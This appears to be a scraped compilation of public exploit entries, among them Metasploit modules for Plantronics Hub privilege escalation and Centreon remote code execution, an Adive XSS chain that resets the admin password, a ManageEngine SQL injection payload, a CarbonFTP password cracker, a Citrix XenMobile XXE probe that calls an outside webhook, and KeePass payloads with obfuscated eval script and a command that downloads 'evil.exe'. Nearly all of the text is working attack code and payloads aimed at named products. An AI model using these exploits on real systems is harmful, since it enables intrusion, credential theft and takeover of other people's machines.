ISHACK AI BOT

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE include Post::File include Post::Windows::Priv include Post::Windows::Services include Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Plantronics Hub SpokesUpdateService Privilege Escalation', 'Description' => %q{ The Plantronics Hub client application for Windows makes use of an automatic update service `SpokesUpdateService.exe` which automatically executes a file specified in the `MajorUpgrade.config` configuration file as SYSTEM. The configuration file is writable by all users by default. This module has been tested successfully on Plantronics Hub version 3.13.2 on Windows 7 SP1 (x64). }, 'License' => MSF_LICENSE, 'Author' => [ 'Markus Krell', # Discovery and PoC 'bcoles' # Metasploit ], 'References' => [ ['CVE', '2019-15742'], ['EDB', '47845'], ['URL', 'https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf'] ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [['Automatic', {}]], 'DisclosureDate' => '2019-08-30', 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }, 'Notes' => { 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'DefaultTarget' => 0)) register_advanced_options [ OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)', nil]), ] end def base_dir datastore['WritableDir'].blank? ? session.sys.config.getenv('TEMP') : datastore['WritableDir'].to_s end def service_exists?(service) srv_info = service_info(service) if srv_info.nil? vprint_warning 'Unable to enumerate Windows services' return false end if srv_info && srv_info[:display].empty? return false end true end def check service = 'PlantronicsUpdateService' unless service_exists? service return CheckCode::Safe("Service '#{service}' does not exist") end path = "#{session.sys.config.getenv('PROGRAMDATA')}\\Plantronics\\Spokes3G" unless exists? path return CheckCode::Safe("Directory '#{path}' does not exist") end CheckCode::Detected end def exploit unless check == CheckCode::Detected fail_with Failure::NotVulnerable, 'Target is not vulnerable' end if is_system? fail_with Failure::BadConfig, 'Session already has SYSTEM privileges' end payload_path = "#{base_dir}\\#{Rex::Text.rand_text_alphanumeric(8..10)}.exe" payload_exe = generate_payload_exe vprint_status "Writing payload to #{payload_path} ..." write_file payload_path, payload_exe register_file_for_cleanup payload_path config_path = "#{session.sys.config.getenv('PROGRAMDATA')}\\Plantronics\\Spokes3G\\MajorUpgrade.config" vprint_status "Writing configuration file to #{config_path} ..." write_file config_path, "#{session.sys.config.getenv('USERNAME')}|advertise|#{payload_path}" register_file_for_cleanup config_path end end

# Exploit Title: Adive Framework 2.0.8 - Persistent Cross-Site Scripting # Exploit Author: Sarthak Saini # Dork: N/A # Date: 2020-01-18 # Vendor Link : https://www.adive.es/ # Software Link: https://github.com/ferdinandmartin/adive-php7 # Version: 2.0.8 # Category: Webapps # Tested on: windows64bit / mozila firefox 1) Persistent Cross-site Scripting at user add page Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting Payload:- <script>alert(1)</script> POST /admin/user/add HTTP/1.1 Host: 192.168.2.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 62 Origin: http://192.168.2.5 DNT: 1 Connection: close Referer: http://192.168.2.5/admin/user/add Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4 Upgrade-Insecure-Requests: 1 userName=test&userUsername=<script>alert('xss')</script>&pass=test&cpass=test&permission=3 |---------------------------------------------------------------------------------- 2) account takeover - cross side request forgery Description : attacker can craft a malicious javascript and attach it to the stored xss, when admin visits the /admin/user page the payload will trigger. -> Save the payload as exp.js -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==- function execute() { var nuri ="http://192.168.2.5/admin/config"; xhttp = new XMLHttpRequest(); xhttp.open("POST", nuri, true); xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhttp.withCredentials = "true"; var body = ""; body += "\r\n\r\n"; body += "userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web"; xhttp.send(body); return true; } execute(); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==- -> Start a server and host the exp.js. Send the exp.js file in the xss payload Payload:- <script src="http://192.168.2.5/exp.js"></script> POST /admin/user/add HTTP/1.1 Host: 192.168.2.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 143 Origin: http://192.168.2.5 DNT: 1 Connection: close Referer: http://192.168.2.5/admin/user/add Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4 Upgrade-Insecure-Requests: 1 userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3 -> As soon as admin will visit the page the payload will be triggered and the admin password will be changed to hacked@123 |-----------------------------------------EOF-----------------------------------------

# Exploit Title: Sysax Multi Server 5.50 - Denial of Service (PoC) # Google Dork: NA # Date: 2020-01-20 # Exploit Author: Shailesh Kumavat # Vendor Homepage: https://www.sysax.com/ # Software Link: https://www.sysax.com/download.htm#sysaxserv # Version: Sysax Multi Server 5.50 # Tested on: WIndow 7 # CVE : [if applicable] 1) Download software install in window 7 2)run software then click install license 3) upload crash.key file and it will show run again this program 4 ) program crash , never run #!/usr/bin/python buffer = "A" * 1000 payload = buffertry: f=open("crash.key","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!")except: print("File cannot be created.")

#################################################################### # This module requires Metasploit: https://metasploit.com/download # # Current source: https://github.com/rapid7/metasploit-framework # #################################################################### class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, "Name" => "Centreon Authenticated Macro Expression Location Setting Handler Code Execution", "Description" => %q{ Authenticated Remote Code Execution on Centreon Web Appliances. Affected versions: =< 18.10, 19.04 By amending the Macros Expression's default directory to / we are able to execute system commands and obtain a shell as user Apache. Vendor verified: 09/17/2019 Vendor patched: 10/16/2019 Public disclosure: 10/18/2019 }, "License" => MSF_LICENSE, 'Author' => [ 'TheCyberGeek', # Discovery 'enjloezz' # Discovery and Metasploit Module ], 'References' => [ ['URL','https://github.com/centreon/centreon/pull/7864'], ['CVE','2019-16405'] ], "Platform" => "linux", "Targets" => [ ["Centreon", {}], ], "Stance" => Msf::Exploit::Stance::Aggressive, "Privileged" => false, "DisclosureDate" => "Oct 19 2019", "DefaultOptions" => { "SRVPORT" => 80, }, "DefaultTarget" => 0 )) register_options( [ OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]), OptString.new("USERNAME", [true, "The Username of the Centreon Application", "admin"]), OptString.new("PASSWORD", [true, "The Password of the Centreon Application", ""]), OptString.new("TARGETS", [true, "The method used to download shell from target (default is curl)", "curl"]), OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]), ] ) end def exploit begin res = send_request_cgi( "uri" => normalize_uri(target_uri.path, "index.php"), "method" => "GET", ) @phpsessid = res.get_cookies /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body unless token vprint_error("Couldn't get token, check your TARGETURI") return end res = send_request_cgi!( "uri" => normalize_uri(target_uri.path, "index.php"), "method" => "POST", "cookie" => @phpsessid, "vars_post" => { "useralias" => datastore["USERNAME"], "password" => datastore["PASSWORD"], "centreon_token" => token, }, ) unless res.body.include? "You need to enable JavaScript to run this app" fail_with Failure::NoAccess "Cannot login to Centreon" end print_good("Login Successful!") res = send_request_cgi( "uri" => normalize_uri(target_uri.path, "main.get.php"), "method" => "GET", "cookie" => @phpsessid, "vars_get" => { "p" => "60904", "o" => "c", "resource_id" => 1, }, ) /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body res = send_request_cgi( "uri" => normalize_uri(target_uri.path, "main.get.php"), "vars_get" => { "p" => "60904", }, "method" => "POST", "cookie" => @phpsessid, "vars_post" => { "resource_name": "$USER1$", "resource_line": "/", "instance_id": 1, "resource_activate": 1, "resource_comment": "Nagios Plugins Path", "submitC": "Save", "resource_id": 1, "o": "c", "initialValues": "" "a:0:{}" "", "centreon_token": token }, ) begin Timeout.timeout(datastore["HTTPDELAY"]) { super } rescue Timeout::Error vprint_error("Server Timed Out...") end rescue ::Rex::ConnectionError vprint_error("Connection error...") end end def primer @pl = generate_payload_exe @path = service.resources.keys[0] binding_ip = srvhost_addr proto = ssl ? "https" : "http" payload_uri = "#{proto}://#{binding_ip}:#{datastore["SRVPORT"]}/#{@path}" send_payload(payload_uri) end def send_payload(payload_uri) payload = "/bin/bash -c \"" + ( datastore["method"] == "curl" ? ("curl #{payload_uri} -o") : ("wget #{payload_uri} -O") ) + " /tmp/#{@path}\"" print_good("Sending Payload") send_request_cgi( "uri" => normalize_uri(target_uri.path, "main.get.php"), "method" => "POST", "cookie" => @phpsessid, "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": payload, "o": "p", "min": 1 }, ) end def on_request_uri(cli, req) print_good("#{peer} - Payload request received: #{req.uri}") send_response(cli, @pl) run_shell stop_service end def run_shell print_good("Setting permissions for the payload") res = send_request_cgi( "uri" => normalize_uri(target_uri.path, "main.get.php"), "method" => "POST", "cookie" => @phpsessid, "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": "/bin/bash -c \"chmod 777 /tmp/#{@path}\"", "o": "p", "min": 1, }, ) print_good("Executing Payload") res = send_request_cgi( "uri" => normalize_uri(target_uri.path, "main.get.php"), "method" => "POST", "cookie" => @phpsessid, "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": "/tmp/#{@path}", "o": "p", "min": 1, }, ) end end

# Exploit Title: ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection # discovery Date: 2019-01-24 # published : 2020-01-20 # Exploit Author: AmirHadi Yazdani # Vendor Homepage: https://www.manageengine.com/network-configuration-manager/ # Software Link: https://www.manageengine.com/network-configuration-manager/ # Demo: http://demo.networkconfigurationmanager.com # Version: <= Build Version : 12.2 # Tested on: win 2012 R2 ------------ About ManageEngine Network Configuration Manager(NCM) (From Vendor Site) : Network Configuration Manager is a multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. NCM helps automate and take total control of the entire life cycle of device configuration management. -------------------------------------------------------- Exploit POC : # Parameter: apiKey (GET) # Title: PostgreSQL Time Based Blind # Vector: AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) #Payload: http://127.0.0.1/api/json/dashboard/getOverviewList?apiKey=1 AND 1398=(SELECT COUNT(*) FROM GENERATE_SERIES(1,3000000))&TimeFrame=hourly&_=1483732552930 --------------------------

# Exploit Title: NEOWISE CARBONFTP 1.4 - Weak Password Encryption # discovery Date: 2019-01-24 # published : 2020-01-20 # Exploit Author: hyp3rlinx # Vendor Homepage: https://www.neowise.com # Software Link: https://www.neowise.com/freeware/ # Version: 1.4 [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.neowise.com [Product] CarbonFTP v1.4 CarbonFTP is a file synchronization tool that enables you to synch local files with a remote FTP server and vice versa. It provides a step-by-step wizard to select the folders to be synchronized, the direction of the synchronization and option to set file masks to limit the transfer to specific file types. Your settings can be saved as projects, so they can be quickly re-used later. Download: https://www.neowise.com/freeware/ Hash: 7afb242f13a9c119a17fe66c6f00a1c8 [Vulnerability Type] Insecure Proprietary Password Encryption [CVE Reference] CVE-2020-6857 [Affected Component] Password Encryption [Impact Escalation of Privileges] true [Impact Information Disclosure] true [Security Issue] CarbonFTP v1.4 uses insecure proprietary password encryption with a hard-coded weak encryption key. The key for locally stored FTP server passwords is hard-coded in the binary. Passwords encoded as hex are coverted to decimal which is then computed by adding the key "97F" to the result. The key 97F seems to be the same for all executables across all systems. Finally, passwords are stored as decimal values. If a user chooses to save the project the passwords are stored in ".CFTP" local configuration files. They can be found under "C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects". e.g. Password=STRING|"2086721956209392195620939" Observing some very short password examples we see interesting patterns: 27264 27360 27360 27360 27360 = a 27520 27617 27617 27617 27617 = b 27266 27616 27360 27361 27616 = aab 27521 27616 27616 27616 27616 = ba Password encryption/decryption is as follows. Encryption process example. 484C as decimal is the value 18508 97F hex to decimal is the value 2431 (encrypt key) 18508 + 2431 = 20939, the value 20939 would then represent the ascii characters "HL". To decrypt we just perform the reverse of the operation above. 20939 - 2431 = 18508 Next, convert the decimal value 18508 to hex and we get 484C. Finally, convert the hex value 484C to ascii to retrieve the plaintext password of "HL". CarbonFTP passwords less than nine characters are padded using chars from the current password up until reaching a password length of nine bytes. The two char password "XY" in encrypted form "2496125048250482504825048" is padded with "XY" until reaching a length of nine bytes "XYXYXYXYX". Similarly, the password "HELL" is "2086721956209392195620939" and again is padded since its length is less than nine bytes. Therefore, we will get several cracked password candidates like: "HELLHELL | HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH" However, the longer the password the easier it becomes to crack them, as we can decrypt passwords in one shot without having several candidates to choose from with one of them being the correct password. Therefore, "LOOOOONGPASSWORD!" is stored as the encrypted string "219042273422734224782298223744247862350210947" and because it is greater than nine bytes it is cracked without any candidate passwords returned. From offset 0047DA6F to 0047DAA0 is the loop that performs the password decryption process. Using the same password "HELL" as example. BPX @47DA6F 0047DA6F | 8D 45 F0 | lea eax,dword ptr ss:[ebp-10] | 0047DA72 | 50 | push eax | 0047DA73 | B9 05 00 00 00 | mov ecx,5 | 0047DA78 | 8B D3 | mov edx,ebx | 0047DA7A | 8B 45 FC | mov eax,dword ptr ss:[ebp-4] | [ebp-4]:"2086721956209392195620939" 0047DA7D | E8 F6 6B F8 FF | call carbonftp.404678 | 0047DA82 | 83 C3 05 | add ebx,5 | 0047DA85 | 8B 45 F0 | mov eax,dword ptr ss:[ebp-10] | [ebp-10]:"20867" 0047DA88 | E8 AF AD F8 FF | call carbonftp.40883C | 0047DA8D | 2B 45 F8 | sub eax,dword ptr ss:[ebp-8] | ;<======= BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431 0047DA90 | 66 89 06 | mov word ptr ds:[esi],ax | 0047DA93 | 83 C6 02 | add esi,2 | 0047DA96 | 8B 45 FC | mov eax,dword ptr ss:[ebp-4] | [ebp-4]:"2086721956209392195620939" 0047DA99 | E8 7A 69 F8 FF | call carbonftp.404418 | 0047DA9E | 3B D8 | cmp ebx,eax | 0047DAA0 | 7E CD | jle carbonftp.47DA6F | Ok, simple explanation after SetBPX in 47DA88... At offset 0047DA8D, 97F is subtracted at [ebp-8] local variable which equals the decimal value 2431 (hex 97F) we also see EAX holds the value 55C4 sub eax,dword ptr ss:[ebp-8] therefore, 55C4 – 97F = 4C45 <======= ENCRYPT/DECRYPT KEY PROCESS. mov word ptr ds:[esi],ax add esi, 2 which is 4C45 + 2 = 4C47 <===== THEN Given a two letter combination like "HL": 484C as decimal is 18508 97F hex to decimal is 2431 18508 + 2431 = 20939 = "HL" Done! [Exploit/POC] "CarbonFTPExploit.py" import time, string, sys, argparse, os from pkgutil import iter_modules #Sample test password #LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947 key="97F" #2431 in decimal, the weak hardcoded encryption key within the vuln program. chunk_sz=5 #number of bytes we must decrypt the password by. #Password is stored here: #C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP #Neowise CarbonFTP v1.4 #Insecure Proprietary Password Encryption #By John Page (aka hyp3rlinx) #Apparition Security #=================================================== def carbonftp_conf(conf_file): p="" pipe=-1 passwd="" lst_of_passwds=[] try: for p in conf_file: idx = p.find("Password=STRING|") if idx != -1: pipe = p.find("|") if pipe != -1: passwd = p[pipe + 2: -2] print(" Password found: "+ passwd) lst_of_passwds.append(passwd) except Exception as e: print(str(e)) return lst_of_passwds def reorder(lst): k=1 j=0 for n in range(len(lst)): k+=1 j+=1 try: tmp = lst[n+k] a = lst[n+j] lst[n+j] = tmp lst[n+k] = a except Exception as e: pass return ''.join(lst) def dec2hex(dec): tmp = str(hex(int(dec))) return str(tmp[2:]) def hex2ascii(h): h=h.strip() try: hex_val = h.decode("hex") except Exception as e: print("[!] Not a valid hex string.") exit() filtered_str = filter(lambda s: s in string.printable, hex_val) return filtered_str def chunk_passwd(passwd_lst): lst = [] for passwd in passwd_lst: while passwd: lst.append(passwd[:chunk_sz]) passwd = passwd[chunk_sz:] return lst cnt = 0 passwd_str="" def deob(c): global cnt, passwd_str tmp="" try: tmp = int(c) - int(key, 16) tmp = dec2hex(tmp) except Exception as e: print("[!] Not a valid CarbonFTP encrypted password.") exit() b="" a="" #Seems we can delete the second char as its most always junk. if cnt!=1: a = tmp[:2] cnt+=1 else: b = tmp[:4] passwd_str += hex2ascii(a + b) hex_passwd_lst = list(passwd_str) return hex_passwd_lst def no_unique_chars(lst): c=0 k=1 j=0 for i in range(len(lst)): k+=1 j+=1 try: a = lst[i] b = lst[i+1] if a != b: c+=1 elif c==0: print("[!] Possible one char password?: " +str(lst[0])) return lst[0] except Exception as e: pass return False def decryptor(result_lst): global passwd_str, sz final_carbon_passwd="" print(" Decrypting ... \n") for i in result_lst: print("[-] "+i) time.sleep(0.1) lst = deob(i) #Re-order chars to correct sequence using custom swap function (reorder). reordered_pass = reorder(lst) sz = len(reordered_pass) #Flag possible single char password. no_unique_chars(lst) print("[+] PASSWORD LENGTH: " + str(sz)) if sz == 9: return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-4] + " | " + reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass) #Shorter passwords less then nine chars will have several candidates #as they get padded with repeating chars so we return those. passwd_str="" return reordered_pass def display_cracked_passwd(sz, passwd): if sz==9: print("[*] PASSWORD CANDIDATES: "+ passwd + "\n") else: print("[*] DECRYPTED PASSWORD: "+passwd + "\n") def parse_args(): parser = argparse.ArgumentParser() parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files") parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password") return parser.parse_args() def main(args): global passwd_str, sz victim="" if args.user and args.encrypted_password: print("[!] Supply a victims username -u or single encrypted password -p, not both.") exit() print("[+] Neowise CarbonFTP v1.4") time.sleep(0.1) print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption") time.sleep(0.1) print("[+] Discovered and cracked by hyp3rlinx") time.sleep(0.1) print("[+] ApparitionSec\n") time.sleep(1) #Crack a dir of carbonFTP conf files containing encrypted passwords -u flag. if args.user: victim = args.user os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/") dir_lst = os.listdir(".") for c in dir_lst: f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r") #Get encrypted password from conf file passwd_enc = carbonftp_conf(f) #Break up into 5 byte chunks as processed by the proprietary decryption routine. result_lst = chunk_passwd(passwd_enc) #Decrypt the 5 byte chunks and reassemble to the cleartext password. cracked_passwd = decryptor(result_lst) #Print cracked password or candidates. display_cracked_passwd(sz, cracked_passwd) time.sleep(0.3) passwd_str="" f.close() #Crack a single password -p flag. if args.encrypted_password: passwd_to_crack_lst = [] passwd_to_crack_lst.append(args.encrypted_password) result = chunk_passwd(passwd_to_crack_lst) #Print cracked password or candidates. cracked_passwd = decryptor(result) display_cracked_passwd(sz, cracked_passwd) if __name__=="__main__": parser = argparse.ArgumentParser() if len(sys.argv)==1: parser.print_help(sys.stderr) exit() main(parse_args()) [POC Video URL] https://www.youtube.com/watch?v=q9LMvAl6LfE [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: Website contact form not working, several attempts : January 12, 2020 CVE Assigned by mitre : January 13, 2020 January 20, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection # Google Dork: inurl:zdm logon # Date: 2019-11-28 # Exploit Author: Jonas Lejon # Vendor Homepage: https://www.citrix.com # Software Link: # Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3 # Tested on: XenMobile # CVE : CVE-2018-10653 #!/usr/bin/python3 ## ## PoC exploit test for the security vulnerability CVE-2018-10653 in XenMobile Server 10.8 before RP2 and 10.7 before RP3 ## ## This PoC was written by Jonas Lejon 2019-11-28 <[email protected]> https://triop.se ## Reported to Citrix 2017-10, patch released 2018-05 ## import requests import sys from pprint import pprint import uuid # Surf to https://webhook.site and copy/paste the URL below. Used for XXE callback WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/" id = str(uuid.uuid1()) xml = '''<?xml version="1.0" encoding="UTF-8" standalone='no'?><!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "''' + WEBHOOK + id + '''/test.dtd">%j00t9; ]>''' print(id) response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False, headers= {'User-Agent': 'MDM/1.0', 'Connection': 'close', 'Content-Type': 'application/x-apple-aspen-mdm'}, data=xml,stream=True ) print(response.content) print(response.text) pprint(response)

# Exploit Title : KeePass 2.44 - Denial of Service (PoC) # Product : KeePass Password Safe # Version : < 2.44 # Date: 2020-01-22 # Vendor Homepage: https://keepass.info/ # Exploit Author: Mustafa Emre Gül # Website: https://emregul.com.tr/ # Tested On : Win10 x64 # Description : The free, open source, light-weight and easy-to-use password manager. PoC: Open KeePass > Help > About KeePass > Help (any local help area) > Drag&Drop HTML File Save the contents to html. Payload-1: (DoS & Run Cmd) <script type="text/javascript"> //<![CDATA[ <!-- var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" + "harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+ "\\\\,l=x.length;for(i=0;i<l;i++){if(i==28)y+=i;y%=127;o+=String.fromCharCod" + "e(x.charCodeAt(i)^(y++));}return o;}f(\\\"\\\\xr}jMDLW\\\\\\\\nRTN\\\\\\\\\\"+ "\\\\\\LFE\\\\\\\\004\\\\\\\\017\\\\\\\\022GD\\\\\\\\\\\\\\\\^\\\\\\\\rhGjYh" + "83#9y2/(-s:\\\\\\\\021\\\\\\\\024\\\\\\\\013\\\\\\\\025Y9D\\\\\\\\037E\\\\\\"+ "\\034\\\\\\\\013F\\\\\\\\017\\\\\\\\002\\\\\\\\003\\\\\\\\037\\\\\\\\021\\\\"+ "\\\\005\\\\\\\\033\\\\\\\\021\\\\\\\\030\\\\\\\\020*UX\\\\\\\\032\\\\\\\\02" + "5\\\\\\\\025\\\\\\\\010\\\\\\\\030\\\\\\\\020t<^!M@;?T+4W~Q`3}tfr4}bch4\\\\" + "\\\\177jith\\\\\\\\\\\"\\\\|\\\\\\\\003g[TLTB[u\\\\\\\\010\\\\\\\\013OB@[U_" + "F\\\\\\\\016h\\\\\\\\027\\\\\\\\033\\\\\\\\006d\\\\\\\\033\\\\\\\\004gNaP\\" + "\\\\\\003\\\\\\\\\\\"\\\\.&:z\\\\\\\\0314\\\\\\\\033&u9(>$>;p=3=3 70=d\\\\\\"+ "\\006y\\\\\\\\n\\\\\\\\037\\\\\\\\r<\\\\\\\\022\\\\\\\\010\\\\\\\\022\\\\\\" + "\\027J \\\\\\\\010\\\\\\\\004\\\\\\\\007\\\\\\\\r\\\\\\\\0177NS2\\\\\\\\035" + ",\\\\\\\\037.\\\\\\\\001(\\\\\\\\033VWX=\\\\\\\\023\\\\\\\\026\\\\\\\\\\\\\\"+ "\\\\\\\\\\016\\\\\\\\026l!\\\\\\\\\\\"\\\\_vYh'()Ynx-}g|1/3Wgsvl|Uyvx}k\\\\" + "\\\\010}\\\\\\\\000tWFTNX]\\\\\\\\004xDHBCl\\\\\\\\023\\\\\\\\033\\\\\\\\02" + "3\\\\\\\\024iDkV\\\\\\\\031\\\\\\\\032\\\\\\\\033\\\\\\\\177\\\\\\\\\\\\\\\\"+ "RS`2*/j\\\\\\\\0273)`\\\\\\\\025h\\\\\\\\027n\\\\\\\\021l,=5|6,0\\\\\\\\nu\\"+ "\\\\\\004{\\\\\\\\006yu}~\\\\\\\\003\\\\\\\\022=\\\\\\\\014CDE5\\\\\\\\002\\"+ "\\\\\\034I\\\\\\\\031\\\\\\\\003\\\\\\\\000MSO>\\\\\\\\036\\\\\\\\006\\\\\\" + "\\033\\\\\\\\035\\\\\\\\033\\\\\\\\021WXYZ'\\\\\\\\016!\\\\\\\\020 !\\\\\\\\"+ "\\\"\\\\_vYh;'ziye}z1LcN}(:tx|`$GnAp#\\\\\\\\017IVNH\\\\\\\\033\\\\\\\\004\\"+ "\\\\\\016\\\\\\\\023\\\\\\\\031\\\\\\\\021\\\"\\\\,28)\\\"(f};)lo,0(rtsbus." + "o nruter};)i(tArahc.x=+o{)--i;0=>i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)401" + "=!)31/l(tAedoCrahc.x(elihw;lo=l,htgnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\""+ ")" ; while(x=eval(x)); //--> //]]> </script> <script type="text/javascript"> //<![CDATA[ <!-- var x="function f(x){var i,o=\"\",ol=x.length,l=ol;while(x.charCodeAt(l/13)!" + "=48){try{x+=x;l+=l;}catch(e){}}for(i=l-1;i>=0;i--){o+=x.charAt(i);}return o" + ".substr(0,ol);}f(\")19,\\\"ZPdw771\\\\b77-0xjk-7=3771\\\\sp,cw$520\\\\:330\\"+ "\\xg030\\\\jj9%530\\\\b000\\\\XZUUVX620\\\\LP\\\\\\\\Pr\\\\610\\\\KOHD400\\" + "\\620\\\\720\\\\\\\\\\\\WOWGPr\\\\530\\\\NClAauFkD,$gqutdr/3-ig~`|)rkanwbo2" + "30\\\\t\\\\ 520\\\\&310\\\\$n\\\\200\\\\)230\\\\/000\\\\-K530\\\\310\\\\310" + "\\\\n\\\\630\\\\010\\\\IULFW620\\\\600\\\\400\\\\700\\\\520\\\\=*100\\\\(70" + "0\\\\4500\\\\*310\\\\-u}xy8pt~}|{771\\\\itg/e771\\\\sb|`V620\\\\530\\\\NT\\" + "\\\\\\MdYjGh010\\\\@TVI[O410\\\\620\\\\n\\\\330\\\\ZB@CQA200\\\\SAijArGhEec" + "J{HaN*2S?9t)V)5,&waedtbn\\\\!010\\\\'420\\\\%n\\\\+r\\\\U]XY030\\\\PT^]\\\\" + "\\\\[ZY]GZEr\\\\CYQ@b~4|);/pw$:2'610\\\\?410\\\\=220\\\\vn720\\\\h520\\\\hz" + "f7!%$4\\\"\\\\730\\\\L\\\\\\\\JOfWdEjN420\\\\230\\\\230\\\\IU710\\\\@BE_IG]" + "AHyV771\\\\430\\\\300\\\\|kntnxixnv|:`kwe2S3h|r~)|wowgp>o\\\\\\\\410\\\\!B7" + "30\\\\330\\\\430\\\\020\\\\K030\\\\)600\\\\/L530\\\\530\\\\330\\\\600\\\\QN" + "C400\\\\500\\\\r\\\\320\\\\710\\\\720\\\\320\\\\M620\\\\710\\\\500\\\\2+>3?" + "\\\"(f};o nruter};))++y(^)i(tAedoCrahc.x(edoCrahCmorf.gnirtS=+o;721=%y{)++i" + ";l<i;0=i(rof;htgnel.x=l,\\\"\\\"=o,i rav{)y,x(f noitcnuf\")" ; while(x=eval(x)); //--> //]]> </script> Payload-2: (run iexplorer.exe & download infected file) <html><body> <script> function exec(cmdline, params) { var fso = new ActiveXObject("Scripting.FileSystemObject"); fileExist = fso.FileExists(cmdline); if (!fileExist) { alert("The requested application is not installed."); } else { var shell = new ActiveXObject( "WScript.Shell" ); if (params) { params = ' ' + params; } else { params = ''; } shell.Run('"' + cmdline + '"' + params); } } </script> <a href="javascript:exec('C:\\Program Files\\Internet Explorer\\iexplore.exe', '-nomerge http://ipaddress/evil.exe');">Edition Mode Active</a> </body></html>

